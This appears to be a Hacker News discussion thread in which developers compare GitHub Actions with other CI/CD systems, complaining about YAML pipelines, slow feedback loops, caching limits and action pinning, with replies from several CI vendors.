But in many cases, you do actually want the pipeline functionality that something like Gitlab CI offers - having multiple jobs instead of a single one has many benefits (better/shorter retry behaviour, parallelisation, manual triggers, caching, reacting to specific repository hooks, running subsets of tests depending on the changed files, secrets in env vars, artifact publishing, etc.). It's at this point that it becomes almost unavoidable to use many of the configuration features including branching statements, job dependencies etc. and that's where it gets messy.
The problem is really that you're forced to do all of that in YAML instead of an actual programming language.
Although we’re using temporal to schedule the workflows, we have a full-code typescript CI/CD setup.
We’ve been through them all starting with Jenkins ending with drone, until we realized that full-code makes it so much easier to maintain and share the work over the whole dev org.
No more yaml, code generating yaml, product quirk, groovy or DSLs!
This has been my entire strategy since I've been able to do this:
https://learn.microsoft.com/en-us/dotnet/core/deploying/#pub...
Pulling the latest from git, running "dotnet build" and sending the artifacts to zip/S3 is now much easier than setting up and managing Jenkins, et. al. You also get the benefit of having 100% of your CI/CD pipeline under source control alongside the product.
In my last professional application of this (B2B/SaaS; customer hosts on-prem), we didn't even have to write the deployment piece. All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
My concern with this kind of deployment solution, where the customer is instructed to install software from links received in e-mails, is that someone else could very easily send them a link to a malicious installer and they would be hosed. E-mail is not authenticated (usually) and the sender can be forged.
I suppose you could use a shared OneDrive folder or something, which would be safer, as long as the customer doesn't rely on receiving the link to OneDrive by e-mail.
Docker and to some extent, however unwieldy, Kubernetes at least allow you to run anywhere, anytime without locking you into a third party.
A "pipeline language" that can run anywhere, even locally, sets up dependency services and initial data, runs tests and avoids YAML overload would be a much needed addition to software engineering.
Do not recommend this approach (of using docker for building).
It's very satisfying just compile an application with a super esoteric tool chain in docker vs the nightmares of setting it up locally (and keeping it working over time).
We used a single huge docker image with all the dependencies we needed to cross compile to all architectures. The image was around 1GB, it did its job but it was super slow on CI to pull it.
Let me at least recommend depot.dev for having absurdly fast runners.
I shared more context in this thread: https://x.com/solomonstre/status/1895671390176747682
https://github.com/vlang/v/blob/master/ci/linux_ci.vsh
* Consider whether it's not easier to do away with CI in the cloud and just build locally on the dev's laptop
With fast laptops and Docker you can get perfectly reproducible builds and tests locally that are infinitely easier to debug. It works for us.
I think builds must be possible locally, but i’d never rely on devs for the source of truth artifacts running in production, past a super early startup.
as always, enough decoupling is useful
> as long as it is proper, maintainable code
...in an imperative language you know well and which has a sufficient amount of type/null checking you can tolerate.
Also lol @deng
Are the Actions a little cumbersome to set up and test? Sure. Is it a little annoying to have to make somewhat-useless commits just to re-trigger an Action to see if it works? Absolutely. But once it works, I just set it and forget it. I've barely touched my workflows in ~4 years, outside of the Node version updates.
Otherwise, I'm very pleased with both. My needs must just be simple enough to not run into these more complicated issues, I guess?
GitHub CI is designed in a way which tends to work well for
- languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
- relatively well contained project (e.g. one JS library, no mono repo stuff)
- no complex needs for integration tests
- no need for compliance enforcement stuff, especially not if it has to actually be securely enforced instead of just making it easier to comply then not to comply
- all developers having roughly the same permissions (ignore that some admin has more)
- fast CI
but the moment you step away from this it just falls more and more and more apart and I every company which doesn't fit the constraints above I have seen so far has non stop issues with GitHub Actions.
But the worst part, which maybe is where a lot of hatred comes from, is that it's there for cheap maybe even free (if you anyway pay for GitHub) and it doesn't need an additional contract, billing, etc. Not an additional vetting of 3rd party companies. Doesn't need managing your own CI service etc. So while it does cause issues non stop it also seems initially still "cheaper" solution for the company. And then when your company realizes it's not and has to setup their own GitHub runner etc. it probably isn't. But that is if you properly account dev time spend on "fixing CI issues" and even then there is the sunk cost fallacy because you already spend so much time to make github actions work and you would have to port everything over etc. Also, realistically speaking, a lot of other CI solutions are only marginally better.
I find github actions works very well for compliance. The ability to create attestations makes it easy to enforce policies about artifact provenance and integrity and was much easier to get working properly compared to my experience attempting to get jenkins to produce attestations.
https://docs.github.com/en/actions/security-for-github-actio...
https://docs.github.com/en/actions/security-for-github-actio...
What was your issue with it?
This is not true at all. It's fine with Haskell, just cache the dependencies to speed up the build...
- GitHub Action cache and build artifact handling is a complete shit show (slow upload, slow download and a lot of practical subtle annoyances, finished off with sub-par integration in existing build systems)
- GitHub runners are comparatively small, so e.g. larger linker steps can already lead to pretty bad performance penalties
and sure like I said, if you project is small it doesn't matter
Or even if you pay $$$ for big runners you can roll it onto your Azure bill rather than having to justify another SAAS service.
This is the key point. Every CI system falls apart when you get too far from the happy path that you lay out above. I don't know if there's an answer besides giving up on CI all together.
The problem isn't github actions but people overloading their build and CI system with all sorts of custom crap. You'd have a hard time doing the same thing twenty years ago with Ant and Hudson (Jenkin's before the fork after Oracle inherited that from Sun). And for the same reason. These systems simply aren't very good as a bash replacement.
If you don't know what Ant is. That was a popular build system for Java before people moved the problem to Maven and then to Gradle (without solving it). I've dealt with Maven files that were trying to do all sorts of complicated things via plugins that would have amounted to two or three lines of bash. Gradle isn't any better. Ant at least used to have simple primitives for "doing" things. But you had to spell it out in XML form.
The point of all this, is that build & CI systems should mainly do simple things like building software. They shouldn't have a lot of conditional logic, custom side effects, and wonky things that may or may not happen depending on the alignment of the moon and stars. Debugging that stuff when it fails to work really sucks.
What helps with Yaml is using Yaml generators. I've used a Kotlin one for a while. Basically, you get auto complete, syntactical sanity, type checking and if it compiles it runs. Also makes it a lot easier to discover new parameters, plugin version updates, etc.
That's supposedly CICD 101. I don't understand why people in this thread seem to be missing this basic fact and instead they vent about irrelevant things like YAML.
You set your pipeline. You provide your own scripts. If a GitHub Action saves you time, you adopt it instead of reinventing the wheel. That's it.
This whole discussion reads like the bike fall meme.
For you to make that comment, I'm not sure you ever went through any basic intro to GitHub Actions tutorial.
GitHub Actions has 'run'.
https://docs.github.com/en/actions/writing-workflows/workflo...
Now that we established that, GitHub Actions also supports custom actions, which is a way to create, share, and reuse high-level actions. Instead of copy-pasting stuff around, you do the equivalent of importing a third party module.
https://docs.github.com/en/actions/sharing-automations/creat...
Onboarding a custom GitHub Action does not prevent you from using steps.run.
I don't even know where to start regarding your comment on expression evaluation and conditions. Have you used a CICD system before?
The problem with half the comments in this thread railing against CICD in general, YAML, etc is that they clearly do not have a faintest idea about what they are doing, and are instead complaining about ther own inability.
I'm an experienced SaltStack user. If I found something I need is too complex to be described in YAML, I'll just write a custom module and/or state. Use YAML just to inform Salt what should happen, and shove the logic in the Python files.
People really should become generalists if they handle the plumbing.
I am with the author - we can do better than the status quo!
I commit code, push it, wait 45 seconds, it syncs to AWS, then all my sites periodically ping the S3 bucket for any changes, and download any new items. It's one of the most reliable pieces of my entire stack. It's comically consistent, compared to anything I try building for a mobile app or pushing to a mobile app store.
I look forward to opening my IDE to push code to the Actions for my web app, and I dread the build pipeline for a mobile app.
Well yeah because nobody is saying it isn't reliable. It's the setup stage that is painful. Once you've done it you can just leave it mostly.
I guess if your CI is very simple and always the same you are exposed to these issues less.
I would recommend looking at Fastlane[0] if you haven't already.
[0] https://github.com/fastlane/fastlane
You notice a deprecation warning in the logs, or an email from GitHub and you make a 1 line commit to bump the node version. Easy.
Sure you can make typos that you don’t spot until you’ve pushed and the action doesn’t run, but I quickly learned to stop being lazy and actually think about what I’m writing, and get someone else to do an actual review (not just scroll down and up and give it a LGTM).
My experience is same as the commenter above, it’s relatively set and forget. A few minutes setup work for hours and hours of benefit over years of builds.
It's how it works now. It doesn't have to forever. We can imagine a future in which it works in a better way. One that isn't so annoying.
> I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
Again you seem to be confused as to what the issue is. Maintenance is not painful. Initial development is.
When it takes all of a day to self host your own task runner on a laptop in your office and have better uptime, lower cost, better performance, and more correct implementations, you have to ask why anyone chooses GHA. I guess the hello-world is convincing enough for some people.
(1) https://github.com/actions/upload-artifact/issues/38
The world is full of kafkaesque nightmares of Dev-ops pipeline "designed" and maintained by committees of people.
It's horrible.
That said, for some personal stuff I have Google Cloud Build that has a very VERY simple flow. Fire, forget and It's been good.
But honestly, doesn't github now have a button you can press to retrigger actions without a commit?
GitHub Actions are least hassle, when you don't care about how much compute time you are burning through. Either because you are using the free-for-open-source repositories version, or because your company doesn't care about the cost.
If you care about the compute time you are burning, then you can configure them enough to help with that, but it quickly becomes a major hassle.
I wouldn't want to maintain GitHub actions for a large project involving 50 people and 5 languages...
I’ve noticed this phenomenon few times already, and I think there’s nothing worse than having a 30-60s feedback loop. The one that keeps you glued to the screen but otherwise is completely nonproductive.
I tried for many moons to replicate GHA environment on local and it’s impossible in my context. So every change is like „push, wait for GH to pickup, act on some stupid typo or inconsistency, rinse, repeat”.
It’s like a slot machine „just one more time and it will run”, eating away focus and time.
It took me 25 minutes to get 5s build process. Naive build with GHA? 3 minutes, because dependencies et al. Ok, let’s add caching. 10 hours fly by.
The cost of failure and focus drop is enormous.
There has to be a better way. How has nobody figured this out?
https://github.com/nektos/act
I wish GitLab/GitHub would provide a way to do this by default, though.
If the process is longer than a few minutes, I can switch tasks while I wait for it. It's waiting for those things in the 3-10 minute range that is intolerable for me: long enough I will lose focus, not long enough for me to context switch.
Now I can bullshit with the LLM about something related to the task while I wait, which helps me to stay focused on it.
Recently switched to a company using Github, and assumed I'd be blown away by their offering because of their size.
Well, I was, but not in the way I'd hoped. They're absolutely awful in comparison, and I'm beyond confused how it got to that state.
If I were running a company and had to choose between the two, I'd pick Gitlab every time just because of Github actions.
I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
If you want to make a CI performant, you'll need to use some of its features like caches, parallel workers, etc. And GHA usability really fall short there.
The only reason I put up with it is that it's free for open source projects and integrated in GitHub, so it took over Travis-ci a few years ago.
> For a Linux user, you can already build such a system yourself quite trivially by getting an FTP account, mounting it locally with curlftpfs, and then using SVN or CVS on the mounted filesystem. From Windows or Mac, this FTP account could be accessed through built-in software.
When the cli didnt have support for what I needed
one of them beeing echoing text to a file. to me, your comparison makes no sense.
Every time someone introduced a new way to use someone else's shared magic I feel nervous about using it. Like GitHub Actions. Perhaps it's time for me to dig into them a bit more and try to understand if/how they're safe to use. But I seem to remember just a few days ago someone mentioning a GitHub action getting hijacked?
I will be stunned if this doesn't become a more popular attack vector over the next few years. Lots of valuable stuff sits in github, and they're a nearly-wide-open hole to access it.
For instance, AWS has a lot of actions they maintain to assist with common CI/CD needs with AWS services.
https://github.com/aws-actions
// Luckily still a gitlab user, but recently forced to Microsoft Teams and office.
my condolences to you and your team for that switch; it's my 2nd used-and-disliked thing (right next to atlassian) - oh well
but one cool feature i found with ms teams that zoom did not have (some years ago - no clue now) is turning off incoming video so you dont have to be constantly distracted in meetings
edit: oh yeah, re github actions and the user that said: > Glad I’m not the only one
me too, me too; gh actions seem frustrating (from a user hardly using gh actions, and more gitlab things - even though gitlab seems pretty wonky at times, too)
Because the docs are crap perhaps? I prefer it, having used both professionally (and Jenkins, Circle, Travis), but I do think the docs are really bad. Even just the nesting of pages once you have them open, where is the bit with the actual bloody syntax reference, functions, context, etc.
A few years back I wanted to throw in the towel and write a more minimal GHA-compatible agent. I couldn't even find where in the code they were calling out to GitHub APIs (one goal was to have that first party progress UI experience). I don't know where I heard this, so big hearsay warning, but apparently nobody at GitHub can figure it out either.
It's really upsetting how little attention Actions is getting these days (<https://github.com/orgs/community/discussions/categories/act...> tells the story -- the most popular issues have gone completely unanswered).
Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
On a related note, if you're considering https://www.blacksmith.sh/, you really should consider https://depot.dev/. We evaluated both but went with Depot because the team is insanely smart and they've solved some pretty neat challenges. One of the cooler features is that their caching works with the default actions/cache action. There's absolutely no need to switch out popular third party actions in favor of patched ones.
Hi, Dagger CEO here. We're advertising a new use case for Dagger (running AI agents) while continuing to support the original use case (running complex builds and tests). Dagger has always been a general purpose engine, and our community has always used it for more than just CI. It's still the exact same engine, CLI, SDKs and observability stack. It's not like we're discontinuing a product, to the contrary: we're getting more workloads on the platform, which benefits all our users.
I think what we're doing is different: we built a product that was always meant to be general purpose; encouraged our community to experiment with alternative use cases; and are now doubling down on a new use case, for the same product. We are still worried about the perception of a FOMO-driven AI pivot (and the reactions on this thread confirm that we still have work to do there); but we're confident that the product really is capable of supporting both.
Thank you for the thoughtful comments, I appreciate it.
Example:
https://github.com/actions/runner/pull/2477#issuecomment-244...
What happened there?
What makes Depot so fast is that they use NVMe drives for local caching and they guarantee that the cache will always be available for the same builders. So you don't suffer from the cold-start problem or having to load your cache from slow object storage.
We also do native multi-platform builds behind one build command. So you can call depot build —platform Linux/amd64,linux/arm64 and we will build on native Intel and ARM CPUs and skip all the emulation stuff. All of that adds up to really fast image builds.
Hopefully that’s helpful!
You wouldn't really have to change anything on your dockerfile to leverage this and see significant speed up.
The docs are here: https://docs.warpbuild.com/docker-builders#usage
Do people really consider this best practice? I disagree. I absolutely don't want CI touching my code. I don't want to have to remember to rebase on top of whatever CI may or may not have done to my code. Not all linters are auto-fixable so anyway some of the time I would need to fix it from my laptop. If it's a trivial check it should run as a pre-commit hook anyway. What's next, CI should run an LLM to auto-fix failing test cases?
Do people actually prefer CI auto-fixing anything?
Doing it in CI sounds like making things more complicated by resetting to remote branches after pushing commits. And, in the worst case, something that actually brakes code that works locally.
Why do they have a say in this? This is up to tech leadership to set standards that need to be followed.
I’m also with the other commenter about settings these things at the Editor level, but also at the pre-push level.
We benchmark how long it takes to format/lint only changed files, usually no more than a second, maybe two, but I admit for some languages this may take more. An editor with a language server properly setup would have helped you find issues earlier.
We also have reports for our CI pipeline linters, so if we see more than 1 report there, we sent a message to the team: It means someone didn’t setup their editors nor their git hooks.
If the checks take more than a second, yeah, probably pre-commit is not the place/moment. Reliability is important, but so is user experience. I had companies where they ran the unit test suite at the pre-commit level, alright? And that is NOT fine. While it sounds like it’ll find issues earlier, it’ll screw your developer time if they have to wait seconds/minutes each time they fix a comma.
Because at the institutional level, there isn’t the appropriate will to mandate that devs fix their local environments, and I don’t feel like burning my own political capital on that particular fight.
Agreed on the performance comments.
I'd rather have linting pushed into the editing process, within my IDE/VS Code/vim plugins, whathaveyou, where it can feedback-loop with my actual writing process and not just be some ancillary command I run with lots of output I never read.
We have a lot of IDE checks, but they’re just warnings when debugging (because devs complained, IMO reasonably, that having them as errors during dev was too inconvenient during development/debugging). CI fails with any warnings, and we have devs who don’t bother to check their IDE warnings before committing and pushing to a PR.
Trivial mistakes in PRs are almost always signs of larger errors.
(Most of the time, the auto-fix is just running "cargo fmt".)
Things like 10 GB cache limits in GitHub, concurrency limits based on runner type, the expensive price tag for larger GitHub runners, and that's before you even get to the security ones.
Having been building Depot[0] for the past 2.5 years, I can say there are so many foot guns in GitHub Actions that you don't realize until you start seeing how folks are bending YAML workflows to their will.
We've been quite surprised by the `container` job. Namely, folks want to try to use it to create a reproducible CI sandbox for their build to happen in. But it's surprisingly difficult to work with. Permissions are wonky, Docker layer caching is slow and limited, and paths don't quite work as you thought they did.
With Depot, we've been focusing on making GitHub Actions exponentially faster and removing as many of these rough edges as possible.
We started by making Docker image builds exponentially faster, but we have now brought that architecture and performance to our own GHA runners [1]. Building up and optimizing the compute and processes around the runner to make jobs extremely fast, like making caching 2-10x faster without having to replace or use any special cache actions of ours. Our Docker image builders are right next door on dedicated compute with fast caching, making the `container` job a lot better because we can build the image quickly, and then you can use that image right from our registry in your build job.
All in all, GHA is wildly popular. But, the sentiment around even it's biggest fans is that it could be a lot better.
[0] https://depot.dev/
[1] https://depot.dev/products/github-actions
I guess that would be reasonable if we really needed the speedup, but if you're also offering a better QoL GHA experience then perhaps another tier for people like us who don't necessarily need the blazing speed?
We are fully usage based, no minimums etc., and our container builders are faster than others on the market.
We also have a BYOC option that gives 10x cost reduction and used by many customers at scale.
[0] https://warpbuild.com
10,000,000,000 bytes should be enough for anyone! It really is a lot of bytes...
I used GitHub actions when building a fin services app, so I absolutely used the hash to specify Action dependencies.
I agree that this should be the default, or even the required, way to pull in Action dependencies, but saying "almost no one does" is a pretty lame excuse when talking about your own risk. What other people do has no bearing on your options here.
Pin to hashes when pulling in Actions - it's much, much safer
"Defaults matter" is a common phrase, but equally true is: "the pattern everyone recommends including example documentation matters".
It is fair to criticise the usage of GH Actions, just like it's fair to criticise common usage patterns of MySQL that eat your data - even if smarter individuals (who learn from deep understanding, or from being burned) can effectively make correct decisions, since the population of users are so affected and have to learn the hard way or be educated.
Yes, your builds will work as expected for a stretch of time, but that period will come to an end, eventually.
Then one day you will be forced to update those pinned dependencies and you might find yourself having to upgrade through several major versions, with breaking changes and knock-on effects to the rest of your pipelines.
Allowing rolling updates to dependencies helps keep these maintenance tasks small and manageable across the lifetime of the software.
Just make sure you don’t leak secrets to your PRs. Also I usually review changes in updated actions before merging them. It doesn’t take that much time, so far I’ve been perfectly fine with doing that.
[1]: https://docs.renovatebot.com/modules/manager/github-actions/...
Though, yes, I prefer pinning dependencies for my personal projects. I don't see why things should break when I explicitly keep them the same.
The real problem is security vulnerabilities in these pinned dependencies. You end up making a choice between:
1. Pin and risk a malicious update.
2. Don't pin and have your dependencies get out of date and grow known security vulnerabilities.
This is for composite actions. For JS actions what if they don't lock dependencies but pull whatever newest package at action setup time? Same issue.
Would have to transitively fork everything and pin it myself, and then keep it updated.
As for reducing boilerplate in the CI configs, GitHub Actions is a programming language with support for functions! It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository. The function call syntax is also a bit unusual, it's written with the `uses` keyword. So there is a lot of boilerplate that you can't remove this way, though there are several other yaml eDSLs hidden in GitHub Actions that address some points of it. E.g. you can create loops with `matrix`, but again, not general-purpose loops, they can only appear in a very specific syntactic location.
To really duplicate stuff, rather than copy-pasting blocks of yaml, without using a mix of these special yaml eDSLs, in the past I've used Nix and Python to generate json. Now I'm using RCL for this (https://rcl-lang.org). All of them are general-purpose yaml deduplicators, where you can put loops or function calls anywhere you want.
FYI there is also `on: workflow_call` which you can use to define reusable jobs. You don't have to create a new repository for these
https://docs.github.com/en/actions/writing-workflows/workflo...
In my experience, the best strategy is to minimize your use of it — call out to binaries or shell scripts and minimize your dependence on any of the GHA world. Makes it easier to test locally too.
I have done something similar with Jenkins and groovy CI library used by Jenkins pipeline. But it wasn't super simple since a lot of it assumed Jenkins. I wonder if there is a more cleaner open source option that doesn't assume any underlying platform.
Like teams.
GitHub Actions is the worst possible CI platform - except for all the others. Every single CI platform has weird limitations, missing features, gotchas, footguns, pain points. Every single one requires workarounds, leaves you tearing your hair out, banging the table trying to figure out how to do something that should be simple.
Of all of them I've tried, Drone is the platonic ideal of the best, simplest, most generally useful system. It is limited. But that limitation is usually easy to work around and doesn't impose artificial constrictions. However, you won't find nearly as many canned solutions or plugins as GitHub Marketplace, and the enterprise features are few.
GHA is great because of things like Dependabot, and the million canned Marketplace actions, and it's all tightly integrated with GH's features, so you don't have to work hard to get anything advanced or specific to work. Tight integration can save you weeks to months of development time on a CI solution. I've literally seen teams throw out versioning of dependencies entirely because they weren't updating their dependencies, because there's no Dependabot orb for CircleCI. If they had just been on GHA using Dependabot it would have saved them literal years of headaches.
Jenkins is, ironically, both the most full-featured, and the absolute worst to configure/maintain. Worst design, worst security, worst everything... except it does have a plugin for everything, and a UI for everything. I hate it with the fire of a million suns. But people won't stop using it, partially because it's so goddamn configurable, and they learned it years ago and won't stop using it. If anyone wants to write a replacement, I'm happy to help (I even wrote a design doc!).
Anyone who claims that GHA is garbage and any of the others are amazing is either doing something very basic or is crazy, or lying.
At the end of the day, you run shell scripts and commands using a YAML based config language (except for Jenkins). Amazingly, it's hard to build something that does that with the right abstractions and compromises between flexibility and good hygiene.
That may have been true before GitHub decided that PRs can't access repository secrets anymore. Apparently now you can at least add these secrets to Dependabot too (which is still duplicate effort for setup and any time you rotate secrets), but at the time when the change was introduced there were only weird workarounds.
I'm surprised nobody has mentioned dependabot yet. It automates this, keeping action dependencies pinned by hash automatically whilst also bringing in stable upgrades.
The only automation that I know of is cargo vet. Although it doesn’t work for GitHub Actions, the idea sounds useful. Basically, vet allows people who trust each other to vet updates. So one person verifies the diff and then approves the changes. Next, everyone who trusts this person can update the dependency automatically since it has been “vetted”.
[1]: https://github.com/mozilla/cargo-vet
We also, to your point, need more labels than @latest. Most of the time I want to wait a few days before taking latest, and if there have been more updates since that version, I probably don't want to touch anything for a little bit.
Common reason for 2 releases in 2 days: version 1 has a terrible bug in it that version 2 tries to fix. But we won't be certain about that one either until it's been a few more days with no patch for the patch for the patch.
For autoscaling we use terraform-aws-github-runner which will bring up ephemeral AWS machines if there are CI jobs queued on GitHub. Machines are then destroyed after 15 minutes of inactivity so they are always fresh and clean.
For defining build pipelines we use Nix. It is used both for building various components (C++, Go, JS, etc) as well as for running tests. This helps to make sure that any developer on the team can do exactly the same thing that the CI is doing. It also utilizes caching on an S3 bucket so components that don't change between PRs don't get rebuilt and re-tested.
It was a bit of a pain to set up (and occasionally a pain to maintain), but overall it's worth it.
My experience is this works for simple scripts but immediately falls apart when you start to do things like “don’t run the entire battery of integration tests against a readme change”, or “run two builds in parallel”, or “separate the test step from the build and parallelise it even if the build is serial”.
It’s easy to wrap make build and go about your life, but that’s no easier than just using the GitHub action to call go build or mvn build. T
he complexity comes in “pull that dependency from this place that is in a private repository on GitHub/AWS because it’s 100x faster than doing it from its source”, and managing the credentials etc for all of that stuff. This is also where the “it differs from running locally” comes into it too, funnily enough.
Next to json I also used travisCI and appveyor for projects. And they all had the same (commit and pray) setup that ai hate. I wish if „act“ was a tool directly maintained by the GitHub folks though.
https://github.com/nektos/act
I'm so much happier on projects where I can use the non-declarative Jenkins pipelines instead of GH Actions or BB pipelines.
These YAML pipelines are bad enough on their own, but throw in a department that is gatekeeping them and use runners as powerful as my Raspberry Pi and you have a situation where a lot of developers just give up and run things locally instead of the CI.
I think there's a place for making a builder that looks imperative, but can work out a tree of actions and run them. Gulp is a little bit this way, but again I haven't tried to breakpoint through it either.
If the next evolution in DevEx is not caring about what your code looks like in a stepping debugger, then the one after it will be. Making libraries that present a tight demo app for the Readme.md file and then are impossible to do anything tricky with or god forbid debug just needs to fucking stop. Yesterday. And declarative systems are almost always the worst.
It looks like they have a very specific and unique build process which they really should handle with something more customizable like Jenkins. Instead they're using something that's really intended for quick and light deployments for intense dev ops setup.
I really like GitHub actions, but I'm only doing very simple things. Don't call a fork bad because it's not great when you're eating soup
They either just write a long blog post about how they can't screw in nails with a hammer.
Or they leave their security rules wide open and about half the comments are like, we need tools which stop us from doing stupid things.
No other industry works like this.
What it really does is fire off a WebHook. Repository custom properties and the name of the action are properties that are included in the workflow_job webook. With this you can do anything you want and you're not at all constrained by YAML or runners.
If they had, we'd be reading a different article about how terribly complex and unintuitive Jenkins is.
CI is just a very very hard problem and no provider makes it easy.
[1] https://github.com/actions/runner/blob/6654f6b3ded8463331fb0...
I had a coworker who called it Visual Sorta-Safe which is just about the best parody name I've ever heard in my entire career.
If one action pushes a tag to the repo, `on:tag` does not trigger. The workaround apparently is to make the first action push the tag using a custom SSH key, which magically has the ability to trigger `on:tag`.
The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
You get charged no matter what, a personal access token doesn’t change anything.
If they are concerned about infinite loops then put a limit on how many workflows can be triggered but another workflow. Each time a workflow chains off another pass along some meta data of “runsDeep” and stop when that hits X, which can be configured.
No, requiring a PAT to kick off a workflow from a workflow is gross and makes zero sense. I don’t want every tag associated with my user, I want it to be generic, the repo itself should be attributed. The only way to solve this is to create (and pay for) another GH user that you create PAT tokens under. A bunch of overhead, cost, and complexity for no good reason.
> When you use the repository's GITHUB_TOKEN to perform tasks, events triggered by the GITHUB_TOKEN, with the exception of `workflow_dispatch` and `repository_dispatch`, will not create a new workflow run.
It has bitten me in the rear before too. I use this pattern a lot when I publish a new version, which tags a piece of code and then marks assets as part of that version (for provenance reasons I cannot rebuild code).
I'm using GitHub Actions to easily reuse some predefined job setup (like installing a certain Python version on Linux, macOS, Windows runners). For these tyoe of tasks, I find GitHub actions very useful and convenient. If you want to reuse predefined jobs, written by someone else, with GitLab CI/CD, what can I use?
https://docs.gitlab.com/ci/yaml/#includeremote
Since the integration is done statically, it means gitlab can provide you a view of the pipeline script _after_ all components were included, but without actually running it.
We are using this and it is so nice to set up. I have a lot of gripes with other gitlab features (e.g. environments, esp. protected ones and their package registry) but this is one they nailed so far.
1: although TIL that the "script:" field itself is actually required in GLCI https://docs.gitlab.com/ci/yaml/#script
There is a gitlab CI feature `include`, but you pretty much have to write shell scripts inside YAML, losing on whole developer experience (shellcheck etc..). I would recommend this way only if you can't factor your code into a CLI in proper language.
* Barely reproducible because things like the settings of the server (environment variables are just one example) are not version controlled.
* Security is a joke.
* Programming in YAML or any other config format is almost always a mistake.
* Separate jobs often run in their own container, losing state like build caches and downloaded dependencies. Need to be brought back by adding remote caches again.
* Massive waste of resources because too many jobs install dependencies again and again or run even if not necessary. Getting the running conditions for each step right is a pain.
* The above points make everything slow as hell. Spawning jobs takes forever sometimes.
* Bonus points if everything is locked down and requires creating tickets.
* Costs for infra often keep expanding towards infinity.
We already have perfectly fine runners: the machines of the devs. Make your project testable and buildable by everyone locally. Keep it simple and avoid (brittle) dependencies. A build.sh/test.sh/release.sh (or in another programming language once it gets more complicated, see Bun.build, build.zig) and a simple docker-compose.yml that runs your DB, Pub-Sub or whatever. Works pretty well in languages like Go, Rust or TS (Bun). Having results in seconds even if you are offline or the company network/servers have issues is a blessing for development.
There are still things like the mentioned heavy integration tests, merges to main and the release cycle where it makes sense to run it in such environments. I'm just not happy how this CI/CD environments work and are used currently.
- env vars can be scripted, either in YAML or through dotenv files. Dotenv files would also be portable to dev machines
- how is security a joke? Do you mean secrets management? Otherwise, i don't see a big issue when using private runners with containers
- jobs can pass artifacts to each other. When multiple jobs are closely interwined, one could merge them?
- what dependency installation do you mean? You can use prebuilt images with dependencies for one. And ideally, you build once in a pipeline and use the binary as an artifact in other jobs?
- in my experience, starting containers is not that slow with a moderately sized runner (4-8 cpus). If anything, network latency plays a role
- not being able to modify pipelines and check runners must be annoying, I agree
- everything from on-prem license to SaaS license keeps costing more. Somewhere, expenses are made, but that can be optimized if you are in a position to have a say?
By comparing dev machines to runners, you miss one important aspect: portability, automation and testing in different environments. Except when you have a full container engine on your dev machine with flexible network configs, there can be missed issues. Also, you need to prime every dev to run the CI manually or work with hooks, and then you can have funny, machine-specific problems. So this already points to a central CI-system by making builds repeatable and in the same from-scratch envirnment. As for deployment, those shouldn't be made from dev machines, so automated pipelines are the go-to here. Also autmated test reporting goes out the window for dev machines.
Env vars can be scripted, many companies use a tree of instance/group/project scoped vars though, leading to easily breaking some projects when things higher up change. Solvable for sure, guidelines in companies make it a pain. There are other settings like allowed branch names etc. that can break things.
With security, yes I mean mostly secrets management. Essentially everyone who can push to any branch has access to every token. Or just having a typo or mixing up some variables lead to stuff being pushed to production. Running things in the public cloud is another issue.
Passing artifacts between jobs is a possibility. Still leads to data pushed between machines. Merging jobs is also possible, just defeats the purpose of having multiple jobs and stages. The examples often show a separation between things like linting, testing, building, uploading, etc. so people split it up.
With dependencies I mean everything you need to execute jobs. OS, libraries, tools like curl, npm, poetry, jfrog-cli, whatever. Prebuilt images work, but it is another thing you have to do yourself. Building more containers, storing them, downloading them. Also containers are not composable, so for each project or job has its own. The curse of being stateless and the way Docker works.
Starting containers is not slow on a good runner. But I noticed significant delays on many Kubernetes clusters, even if the nodes are <1% CPU. Startup times of >30s are common. Still, even if it would be faster it is still a delay that quickly adds up if you have many jobs in a pipeline.
I agree that dev machines and runners have different behavior and properties. What I mean is local-first development. For most tasks it is totally fine to run a different version of Postgres, Redis and Go for example. Docker containers bring it even closer to a realistic setup. What I want is quick feedback and being able to see the state of something when there a bugs. Not needing to do print debugging via git push and waiting for pipelines. Pipelines that setup a fresh environment and tear it down after are nice for reproducibility, but prevent me to inspect the system aside from logs and other artifacts. Certainly this doesn't mean you shouldn't have a CI/CD environment at all, especially for releases/production deployments.
Simple scripts like these are enough for most projects and it is a blessing if you can execute them locally. Having a CI platform doing it automatically on push/merge/schedule is still possible and makes migrations to other platforms easier.
For real tho, not every project can be build by everyone locally, but at least parts of it should be locally runnable for devs to be able work (at all IMO). What I am noticing is more and more coding is being done on some server somewhere Github Codespaces anyone? Google Colab? etc.
What I am also noticing is that this tools like GH-A there is not really a way to test the CI code other than.. commit, push, wait, commit, push, wait... That's just absurd to me. Obviously all CIs have some quirks that sometimes you have _just run it_ and see if it works but this... it's like that for everything! Abusrd I say!
Laptops are a lot cheaper then the cloud bills I have seen so far. Penny pinching every tiny thing for <100$/€, but cloud seems to run on an infinite magic budget...
Your opinions are so regressive you really should consider going into management.
Nowhere do I say you shouldn't use CI/CD at all. I just don't like the current CI/CD implementations and the environments/workflows companies I worked for so far provide on top of them.
The regressive thing is putting everything ONLY on a remote machine with limited access and control, taped together by a quirky YAML-based DSL as a programming language and still requiring me to program most stuff myself.
$ git l * cbe9658 8 weeks ago rejschaap (HEAD -> add-ci-cd) Update deploy.yml * 0d78a6e 8 weeks ago rejschaap Update deploy.yml * e223056 8 weeks ago rejschaap Update deploy.yml * 8e1e5ea 8 weeks ago rejschaap Update deploy.yml * 459b8ea 8 weeks ago rejschaap Update deploy.yml * a104e80 8 weeks ago rejschaap Update deploy.yml * 0e11d40 8 weeks ago rejschaap Update deploy.yml * 727c1d3 8 weeks ago rejschaap Create deploy.yml
Totally agree with other comments saying to keep as much logic out of CI config as possible. Many CI features are too convoluted for their own good. Keep it really simple. You can use any CI platform and have a shit time if you don't take the right approach.
This also reduces the lock in by orders of magnitude.
I wonder why they chose to move back to Github Actions rather than evaluate something like Buildkite? At least they didn't choose Cloud Build.
I think incremental progress in the CI front is chugging along nicely, and I really haven't seen any breathtaking improvements from other solutions I've tried, like CircleCI.
The article is what you end up finding after that stage has been gone through.
